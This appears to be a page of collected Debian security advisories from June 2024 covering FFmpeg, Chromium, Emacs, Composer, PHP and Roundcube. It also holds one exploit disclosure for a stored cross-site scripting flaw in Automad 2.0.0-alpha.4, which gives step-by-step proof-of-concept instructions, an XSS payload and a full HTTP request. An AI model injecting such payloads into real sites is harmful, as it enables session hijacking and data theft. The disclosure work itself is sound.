Debian Linux Security Advisory 5721-1 - Several vulnerabilities have been discovered in the FFmpeg multimedia framework, which could result in denial of service or potentially the execution of arbitrary code if malformed files/streams are processed.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5721-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
June 26, 2024                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : ffmpeg  
CVE ID         : CVE-2022-48434 CVE-2023-50010 CVE-2023-51793  
                 CVE-2023-51794 CVE-2023-51798

Several vulnerabilities have been discovered in the FFmpeg multimedia  
framework, which could result in denial of service or potentially the  
execution of arbitrary code if malformed files/streams are processed.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 7:4.3.7-0+deb11u1.

We recommend that you upgrade your ffmpeg packages.

For the detailed security status of ffmpeg please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/ffmpeg

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmZ8XGAACgkQEMKTtsN8  
TjayWQ//WBpVVtgWkhyjdpro2pRqJ1gOoRJHzHrx0NHBg1Taz1xL5UPj3YTzFJsf  
h73nAlbqe4uf4NjdcOzRjqsTEVXzIAyV34hh+4R0q9ct13e4f/iDxXKFlm/dNmux  
Lyx1lqT0C9yr7//XORM7zW3t7zaBMr/ZDzodw5ecndIqlqGoEH6IhPPAsPE2L2GA  
bFsN4RUeeI3XLbabWnGTB0DdAV/6oU7S9zb7D8uWuM351q9ihRloIQUNuWJdA2Te  
di85QDZdcM78BCIYwZ8gQpvimZG2GyF2erZni/qaOtp8JmhYHD9BdeIEe3fCNmeM  
R7FkNPHgr/f+h3Gu5/wXOutwtyswxH19R1GkdchPd3NtJhHeu1CY9Wf4OboCReCr  
x4N4Tqw36DUzGOy5mAdDfMyulli/bG5hItLG9krk2mNBI421xRnaSYzG2kvcUqNL  
FtxTPyhsr9Rh105y2eQjWjekTW4V8e/CdAvK/YkOgUtPqNob2LbZeoTu0Iig9zWw  
Ur8Brr/vUQvIGxudIoCpNXyD2VDcVMhAivDZRqdFOQoA7omDTIuO9peVF/71w27u  
2ykEG8QZblkCjKLZXb1G1cpIq+VpGO7V0k92sKqw27npBPvqSXSwAsZ78pvL7Om+  
FJdp/rcQngEApQEUgcIAEvae37Da57Cz+0TTnDHa4N/w8HGjH8w=  
=dG6V  
-----END PGP SIGNATURE-----

Debian Security Advisory 5721-1

Debian Linux Security Advisory 5720-1 - Security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5720-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonJune 25, 2024                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-6290 CVE-2024-6291 CVE-2024-6292 CVE-2024-6293Security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 126.0.6478.126-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmZ7iCsACgkQZF0CR8NudjeZWQ/+OZWXz7T52DkWQeWComrkEqLiOn74kDdkNvKPzi7+miDRBOaADj6r8R/yGvdf3ruxU9GlIeiCelVId62VHJaWkgiPSbWGaiNQk4Ux+BD+L0ng3XPxRBwKhf+MNDA/7WhlHd9npFDHpL0I+JNzKQdotGLbhVAwMATcfxXPK0wgQZabBfLfA9WhafdjqpN2rgRvBLYjlJbQOu9w66O+4IWhleIRBpboKJYKOpfPB71r1gGGrJS/CfcRo7bo4ppk1ZmB7tkAmDRkWTJJMwtaOMSVBmR8ti1fMGPOL02mElOeRaq2PnUA/FHIHClc8uqBz70cWLSuySMG6PCvy19ck/9LBCxS1BfwyEmdN3nmKpu2Ig1UsykcQhMiqcqNG9iYmp37jOoPNUPjKkdzqTx30OWMLAWHFg2RxMKNlQJGZfxOQPt62wJOz9dSsNegunNnQIPLOzkFnkkl87AHMPcyLz9UxKgI2svP3F3cJk5M7MI3WHQJUQUS+0OgG+fCxk95jIm9munt46+99wb9E5wM39cUIieYVx56m5gAS21LxgHkFid3jeTRg7pqC8ObEyh9WL5c+Ssh3zvt5O74bFpzjFCxvD8V2RRRFKOBbaSxPkou05DZHEBHQvWRG+UobmvmBaz4a+gwg1/9TfUPCUeduLmz9mAe67o3RNemGXnAb20QST8==vb9g-----END PGP SIGNATURE-----

Debian Security Advisory 5720-1

Debian Linux Security Advisory 5719-1 - It was discovered that Emacs is prone to arbitrary shell code evaluation when opening a specially crafted Org file.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5719-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
June 25, 2024                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : emacs  
CVE ID         : CVE-2024-39331  
Debian Bug     : 1074137

It was discovered that Emacs is prone to arbitrary shell code evaluation  
when opening a specially crafted Org file.

This update includes updates pending for the upcoming point releases  
including other security fixes.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 1:27.1+1-3.1+deb11u5.

For the stable distribution (bookworm), this problem has been fixed in  
version 1:28.2+1-15+deb12u3.

We recommend that you upgrade your emacs packages.

For the detailed security status of emacs please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/emacs

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmZ7IMRfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0RRkQ//VodTfx1QWzYCV1WDvv2c6lekODGI1RQcM91+LRXnq+LsumEP55j5w26V  
9O1u3Yze/94BVOzlggM3CzPLGeDS1gYDAGvoaZVrkgsK9k9DCN5vKJ3BSJf6vzj7  
wtFVvlmnqIsMLUlu6yUpQlsDw6fhwKqrh4egIigDFSwR8kxzo+wBhTGVfuFLpmxl  
X0B1xAMWsk8srmWxcgvabMvGhSx+z06QHnsguLWljvk+yEQVfVTYqVA3PxySg/Qk  
/7SPwEBuWwe0MU6s4pltET/VdNI7nYeG2qSmWZ6ruFcYa2Xctoe+r2kQ02ngipJK  
RZScLFYmxbRqKDGTayNbXvAE9X6P05bhQvpYoYsnTueYrH5JzB++6Zli43PnT6aj  
ECMHPl7RKv6JOjqZB4VJpfsLw9S8QBkMPtSZ3zfy8/GSX8/113F8k4ur3pu/S3gH  
N8FWbygOYw6MrC7LeKKE77k43Tep1bEQPd6EwwlopjIulDg00tEGXXH9JdmXKH0V  
grgZTPubZvB/RrtW/AHkMrEDGdz9BfEnSxIOrPjbT//9tBVsxSN8jUflxUIoiCew  
v9yw6YUXKaRrIgcvMy/GMg/uaIZmxvYYVlO4eg7QHQ4trwaTtANjUFIya4PCpegu  
zjJS/rfx1BKpDDFQhJY25e7Tj6zfLV57GAb/rrZhRHRGQUCaBqQ=  
=62XM  
-----END PGP SIGNATURE-----

Debian Security Advisory 5719-1

Automad version 2.0.0-alpha.4 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Automad 2.0.0-alpha.4 - Stored Cross-Site Scripting (XSS)# Date: 20-06-2024# Exploit Author: Jerry Thomas (w3bn00b3r)# Vendor Homepage: https://automad.org# Software Link: https://github.com/marcantondahmen/automad# Category: Web Application [Flat File CMS]# Version: 2.0.0-alpha.4# Tested on: Docker version 26.1.4, build 5650f9b | Debian GNU/Linux 11(bullseye)# DescriptionA persistent (stored) cross-site scripting (XSS) vulnerability has beenidentified in Automad 2.0.0-alpha.4. This vulnerability enables an attackerto inject malicious JavaScript code into the template body. The injectedcode is stored within the flat file CMS and is executed in the browser ofany user visiting the forum. This can result in session hijacking, datatheft, and other malicious activities.# Proof-of-Concept*Step-1:* Login as Admin & Navigate to the endpointhttp://localhost/dashboard/home*Step-2:* There will be a default Welcome page. You will find an option toedit it.*Step-3:* Navigate to Content tab orhttp://localhost/dashboard/page?url=%2F&section=text & edit the block named***`Main`****Step-4:* Enter the XSS Payload - <img src=x onerror=alert(1)>*Request:*POST /_api/page/data HTTP/1.1Host: localhostContent-Length: 1822User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryzHmXQBdtZsTYQYCvAccept: */*Origin: http://localhostReferer: http://localhost/dashboard/page?url=%2F&section=textAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie:Automad-8c069df52082beee3c95ca17836fb8e2=d6ef49301b4eb159fbcb392e5137f6cbConnection: close------WebKitFormBoundaryzHmXQBdtZsTYQYCvContent-Disposition: form-data; name="__csrf__"49d68bc08cca715368404d03c6f45257b3c0514c7cdf695b3e23b0a4476a4ac1------WebKitFormBoundaryzHmXQBdtZsTYQYCvContent-Disposition: form-data; name="__json__"{"data":{"title":"Welcome","+hero":{"blocks":[{"id":"KodzL-KvSZcRyOjlQDYW9Md2rGNtOUph","type":"paragraph","data":{"text":"Testingforxss","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"bO_fxLKL1LLlgtKCSV_wp2sJQkXAsda8","type":"paragraph","data":{"text":"<h1>XSSidentified byJerry</h1>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"},"+main":{"blocks":[{"id":"lD9sUJki6gn463oRwjcY_ICq5oQPYZVP","type":"paragraph","data":{"text":"Youhave successfully installed Automad 2.<br><br><img src=xonerror=alert(1)><br>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"NR_n3XqFF94kfN0jka5XGbi_-TBEf9ot","type":"buttons","data":{"primaryText":"VisitDashboard","primaryLink":"/dashboard","primaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingVertical":"0.5rem","paddingHorizontal":"1.5rem"},"primaryOpenInNewTab":false,"secondaryText":"","secondaryLink":"","secondaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingHorizontal":"1.5rem","paddingVertical":"0.5rem"},"secondaryOpenInNewTab":true,"justify":"start","gap":"1rem"},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"}},"theme_template":"project","dataFetchTime":"1718911139","url":"/"}------WebKitFormBoundaryzHmXQBdtZsTYQYCv--*Response:*HTTP/1.1 200 OKServer: nginx/1.24.0Date: Thu, 20 Jun 2024 19:17:35 GMTContent-Type: application/json; charset=utf-8Connection: closeX-Powered-By: PHP/8.3.6Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 30`{"code":200,"time":1718911055}*Step-5:* XSS triggers when you go to homepage - http://localhost/

Automad 2.0.0-alpha.4 Cross Site Scripting

Debian Linux Security Advisory 5718-1 - It was discovered that Org Mode for Emacs is prone to arbitrary shell code evaluation when opening a specially crafted Org file.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5718-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
June 25, 2024                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : org-mode  
CVE ID         : CVE-2024-39331  
Debian Bug     : 1074136

It was discovered that Org Mode for Emacs is prone to arbitrary shell  
code evaluation when opening a specially crafted Org file.

This update includes updates pending for the upcoming point releases  
including other security fixes.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 9.4.0+dfsg-1+deb11u3.

We recommend that you upgrade your org-mode packages.

For the detailed security status of org-mode please refer to its  
security tracker page at:  
https://security-tracker.debian.org/tracker/org-mode

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmZ7HkJfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Ra0w/7BHBmDTLHRfXymGImQAh7e7QnVf2jliLZQKK//LuavYD0ts7ooPO7rHtF  
h/1iEw9/VIbj1D6FYsTfD3hD63YISgy0+NbygFqviiE/QYEt4V6GvGUbR8hhb0iZ  
6fMKJcwBxfjCa8XOK/k9vK8tkrmEdF5dxGYyUOxeRGSpMoJyIFFdiQzTvtPTLVgf  
Q3kwznZjrSsFodM3Cwh8fpSf0qwJxQ5cRdll0lQ5YAJnZAs7tmOvI1gJWzr60xC+  
iJNlc2BuKJpDbWGcd4hKLttmzfm1Awgg79xRbkWH4o36+gFz7XsPWDhUg8eUnAKJ  
LYkkNB7THyVj8iOKl657eVOWwK0mpWe9v8aq1JFOkIJ9/544DZo6OqJBli1CH/vO  
xRmol8AVGogBCNTRi+eG30aVfA3EMmf20qH+BIUOmb9CYwRAxIyOOT1TBHx5UCay  
V/JuF4LxajBGcYLavQg8ajD23UssEX+JOy/COG7jgUFrbzqaGYD+fn5iCmPoNaP9  
09mP2s9xUn2E5Q9/B7JOn/bG9wpRm9lYFKUZJ0gGYZDLtOC77cf7Etc0TsSs9258  
rZotSV30e81nxmz4w2Myv06acP11S51nMfm9EUMQkeK3j16IIco9zhpIcSbrHQDr  
gmkgrO16VfoRfWN5PovELosaYPDs3/zwS3ZJjENEYNQYBd2DrKk=  
=2Z9A  
-----END PGP SIGNATURE-----

Debian Security Advisory 5718-1

Debian Linux Security Advisory 5715-2 - The update for composer released as DSA 5715 introduced a regression in the handling of git feature branches. Updated composer packages are now available to address this issue.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5715-2                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
June 24, 2024                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : composer

The update for composer released as DSA 5715 introduced a regression  
in the handling of git feature branches. Updated composer packages  
are now available to address this issue.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 2.0.9-2+deb11u4.

The stable distribution (bookworm) is not affected.

We recommend that you upgrade your composer packages.

For the detailed security status of composer please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/composer

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmZ5vjkACgkQEMKTtsN8  
TjbZPhAAlCCPInB2gsJz5gYa3aOq8nFpc/MT5oACPw+eWlClzPcg4dhNA5Uyr81b  
399Vqd1u9YrxjNbFdeUEAbXSx+KsjIknl1qeCIpPCEKS9YViPL63zKGMTrG8b6Tb  
o/7Lobi5f33vCWVMm4GswCc3dSeA3pwuv/V14nhbbEi89ABrGNvlXT1MFfUpvlMb  
f4ixjnpbyHmkJQR8FI0LjNEj8pwcC6C4kBbtahfXwwDFRNKfRm/MD6KPbsAnOJdu  
UnCwmQv8WT1NiZ47oS+8Fku1CP3HI+47nF/XxRioeGf2bocksJUwQz782oHQlzRI  
MUkh73IuKYyKs9RltzH7Q38Ubw33invMDAvMAcU+w4agMuoYH8u7XbYked/2K0S6  
T1tDsWO6uh5zyzkJ0s7xR0S/KbeHiQ0eoLM+GCqVv91rxvg6KRqKD8srN8WPgPKW  
+lBb0gRubptXpAb3Ptb/zxuPaGVUm4pn3Tltwf+oD6hLHJ0J/jcwECsU4g2+HNek  
Pbp2oOC5+4SxVbbOkXzp1XFLm2e3VUfTBJZqnv4vrKckmsojQs0NtA5fax4VHEiF  
dAacKmkPngiKrjHcjSxSam1SWO/Z/jgav9pW8Kcs1hQ1xTWv8cqLgtnF9OL6Kt2r  
I2q8Ub4IQ+gjX5uee9wIgbTQhwF2sMD7uhnmmI1yITttdB3uxKQ=  
=EuWI  
-----END PGP SIGNATURE-----

Debian Security Advisory 5715-2

Debian Linux Security Advisory 5717-1 - It was discovered that user validation was incorrectly implemented for filter_var(FILTER_VALIDATE_URL) for php8.2.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5717-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
June 20, 2024                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : php8.2  
CVE ID         : CVE-2024-5458

It was discovered that user validation was incorrectly implemented  
for filter_var(FILTER_VALIDATE_URL).

For the stable distribution (bookworm), this problem has been fixed in  
version 8.2.20-1~deb12u1.

We recommend that you upgrade your php8.2 packages.

For the detailed security status of php8.2 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/php8.2

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmZ0dO4ACgkQEMKTtsN8  
TjZE3w/+MqMgfCFODFOJynqDrcdQ4cycenVYZc3LhR9Als8W1OViYT/oyXGGlCIY  
iETylmEKhZfm9jUDCLKu0wdFWPkUrpbABUZMGgIW4PG4F4eBxDCaLbtqoaQgyOJ5  
wcx2f9MDtg+ST1NOpjRYUDoDaXapfSNefegUedXdapXgA3IrYFt2XnTo7su7eO5i  
2lBCguFY2errAUqsM9IDrmryYVu43BelVVsxnL+qQ3WUeIxL8tQDBXTmB1g+cQRk  
wC1dHrXWok5op0cRR8Wv9gVW0hDugLt7r+mhOMPgo3AyB1eOKdvRvrUWEveLeH1P  
Mozki0nWfjKW0V5cE/0vKFY0Oxo9WJHo8lvWnx1S2Bd3Grrxps2oRT6NRGN8nsBM  
WcViPXZwAIu2Q+1vQUAnWB48zExV3vOOMdzoUw6ROy+N4fIfXH7GjycENOPb0jYi  
Ty94WeOLQcTAcjtlBZaa5YuZjPZBdsf98n0NC+NtK61pERD8wio8OLm7RtMcGy8T  
GgUQzMXDpkhaEceUA+k1HQiqOVGgq+GxXrAdOHBkElhwZ7/Oq0660T1hV3yDleJz  
hRbMLIXDbG/jTmbpHc3faGgY8PlYE8NPaHou61e1OA8Mn2dlZEJAn1pSPgJibIz0  
MvGNx1AZPBF4TQg+qxbPzZjEO3xHoYyfQs7OOk87V5pVlSdoW1c=  
=th5l  
-----END PGP SIGNATURE-----

Debian Security Advisory 5717-1

Debian Linux Security Advisory 5716-1 - Security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5716-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonJune 19, 2024                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-6100 CVE-2024-6101 CVE-2024-6102 CVE-2024-6103Security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 126.0.6478.114-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmZzIpkACgkQZF0CR8Nudjdx6g/6Au2ftR6rzms9kC3GBwAwD7cpWWIqFPvCYTwuLidwwAma7Z8yWT19PWgHqDUUn0rA1PSHjUII9ZSDcMmvlRcYrZniqXbXQHibn1WhHJpfsInY2ddcBiQzywyTfFUXpQpQlaUEte0qry9fQ5c1Orr8YUc/w7dWThtZIXAEdjLXndvS5ToXKPqM8d6PLKgKDSF+TKhIwC8ft7vxdAW3APupwVolLiqGvkO+b6qLOURg2UHhG+oTf1RG8Klsl4dtm8e8tZPzkKWMv1KjnK4PUxOhHAMO512ZaCDlJNKWbVS/aoc96N+xWXUPOXPWeilXKgd6fsDOYSvofQ8iPwPBZjM+E92nJhXA1dpB7odkh4BRAiyV73txrb5NiOkyWMjo2MDADBhzLJq3oCSnST1V54Mgu81QCK0NdX6vPk1K3UXbFUmIB701GXi740S/ZyAdxO13F3d4SRqASLhMwIyhmHxHQImKRNH6IMeuW2fKaEyrxAvR0mUIkNrNNR/4YxFlWeOgZBvjI5HCk4lwZoHzcBbEQ0txTEkcJOe9KG0Bl36360MEW1U1W/XPNUmWzldnS+AYsnTeJqtNFB0bTKdED9CjW/0KCYIueJ/s4iI+qjVDsAYW9F9TC868gkQ5tiuuTm2Ss1cifvx8QbiGcwTVuIar5zKyZlG9gBvz0pRar6lcDt8==+zlS-----END PGP SIGNATURE-----

Debian Security Advisory 5716-1

Debian Linux Security Advisory 5715-1 - Two vulnerabilities have been discovered in Composer, a dependency manager for PHP, which could result in arbitrary command execution by operating on malicious git/hg repositories.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5715-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJune 18, 2024                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : composerCVE ID         : CVE-2024-35241 CVE-2024-35242Two vulnerabilities have been discovered in Composer, a dependencymanager for PHP, which could result in arbitrary command execution byoperating on malicious git/hg repositories.For the oldstable distribution (bullseye), these problems have been fixedin version 2.0.9-2+deb11u3.For the stable distribution (bookworm), these problems have been fixed inversion 2.5.5-1+deb12u2.We recommend that you upgrade your composer packages.For the detailed security status of composer please refer toits security tracker page at:https://security-tracker.debian.org/tracker/composerFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmZyAQwACgkQEMKTtsN8TjYxTw//by7RwssfrKcrNXWHLSJjcCJLtIUfDCzp31pxo9z1uc2viR1QYgfGgIB6yuUtjY0j8KDVBnvlpo8CTlt9Z5auzgQ0poGzshgKlvFcMwhzt7wQJtoF/mlO1dlABUcUyZvv8YLyKA4oYfRIN9bLSsldTb6gSV1bBTVLZeCggWb69HsFHrDxGmpKbcX43a+QL+qkScNu6wm7AdEG6RHDwJTJuFh72RjsONrg172i/6zL8wVqbGEg1HRYiFCCTYTniZsTi1eqQRSNzqIrq61Z/PFHhE7IS7DpNLF+8nVdTFAolou89/VTJSXO/nQCKR0MN/xHlctKY7wDj4lM3IrqNY0RoG1s4V/EiUz9fzdBitFvozPXgf45h45ETfv77NVw8quKrIQGKUNRtRBoemqHJ3J6ZpmGHyR5MRBjLdlZqnY0LtIq5dbj/AZJE48twaKbP8KsV6Yt7CtXe/c6zbqlRjZsV4p+4qOQtDuSqO751k3gWSLMtgogT4cmKLRuhhobe/zInQIsiUKcAmYiUcTjv2BXnSz2XYNfBn4Sd4/J2Bn+vMRMlLPOj7U3ZOIzZr5gWnSoJrUQEj68icbYHLG2jVGxLpZ+N3YlGEd+V+5N5sklR6Ggy5RjgPCB7at284WtvfU0EggKpgWhjoDx273K/EIVEAaEpvIUe3mhle1Tj3cdeYo==oulZ-----END PGP SIGNATURE-----

Debian Security Advisory 5715-1

CrowdStrike discovered that roundcube, a skinnable AJAX based webmail solution for IMAP servers, did not correctly process and sanitize requests. This would allow an attacker to perform Cross-Side Scripting (XSS) attacks.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5714-1                   security@debian.orghttps://www.debian.org/security/                       Sebastien DelafondJune 18, 2024                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : roundcubeCVE ID         : CVE-2024-37383 CVE-2024-37384Debian Bug     : 1071474Huy Nguyễn Phạm Nhật, and Valentin T. and Lutz Wolf of CrowdStrike,discovered that roundcube, a skinnable AJAX based webmail solution forIMAP servers, did not correctly process and sanitize requests. Thiswould allow an attacker to perform Cross-Side Scripting (XSS) attacks.For the oldstable distribution (bullseye), these problems have been fixedin version 1.4.15+dfsg.1-1+deb11u3.For the stable distribution (bookworm), these problems have been fixed inversion 1.6.5+dfsg-1+deb12u2.We recommend that you upgrade your roundcube packages.For the detailed security status of roundcube please refer toits security tracker page at:https://security-tracker.debian.org/tracker/roundcubeFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCgAdFiEEAqSkbVtrXP4xJMh3EL6Jg/PVnWQFAmZxxS4ACgkQEL6Jg/PVnWSmBAgAlHkpKAMLQuMJh79XHBJD38gMRshGMgxGMmbD38uZBRGhxniE8CSP3Xc2h/92qvSVcNJrjS8H0wPlkhKEV75NoNoofoDVb/Uoa1GcAShVb0pzBDzmBA1hbbdzCHfpGUnu8ghkzh1bBgX/zAwqScXcAGSn1/s4bknhPgEriRvfcAjN7o4S4lFOExSLL+RlqxWfHFNiQt6788BpgnfGZ3OWgAEWoEJdH7wr6/YdH5u/Fne6/1gD2HO3zYHVF4OzuVVkX6fTf+kHH74oGOSz7qtqW7HiriGY6+7j+7i+vSk95aWuxhPrPaGD3yVI02WjtokupJJKmgGVUf3CgNJCMEzCqg===rv9C-----END PGP SIGNATURE-----

Tag

#debian